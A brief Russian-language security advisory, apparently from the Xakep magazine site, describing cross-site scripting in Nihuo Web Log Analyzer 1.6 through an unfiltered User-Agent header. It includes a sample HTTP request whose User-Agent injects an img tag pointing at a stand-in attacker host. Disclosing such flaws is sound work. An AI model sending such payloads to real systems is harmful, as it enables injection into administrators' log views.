Межсайтовый скриптинг в Nihuo Web Log Analyzer

Рекомендуем почитать:

Xakep #304. IP-камеры на пентестах

Содержание выпуска
Подписка на «Хакер»-60%

Программа: Nihuo Web Log Analyzer 1.6

Уязвимость в Nihuo Web Log Analyzer позволяет удаленному пользователю выполнить XSS нападение.
Программа не фильтрует HTML код в поле User-Agent:

Host: sample.com
Connection: close
Accept: text/plain
Accept-Language: en-us,en
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
User-Agent: Some-Fake-UA <img
src='http://attacker.host.com/app.gif'>

Межсайтовый скриптинг в Nihuo Web Log Analyzer

Xakep #304. IP-камеры на пентестах

Подпишись на наc в Telegram!

Из рубрики «Взлом»

По заветам Митника. Как я заколебал всех, но все же получил пароль

HTB Lantern. Ломаем сайт на CMS Blazor

Хакеры.RU. Глава 0х00. Миссия первая

Новый поиск. Колонка главреда

Трюки

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Карманный Arch. Делаем флешку с живым образом Arch Linux

Последние новости

Преступники все чаще злоупотребляют возможностями Cloudflare Pages и Cloudflare Workers

Zabbix предупреждает пользователей о критической уязвимости

Хакеры заявляют, что взломали почти всю лицензионную защиту Windows и Office

Центробанк Уганды подтверждает, что пострадал от кибератаки

Linux-буткит Bootkitty эксплуатирует проблему LogoFAIL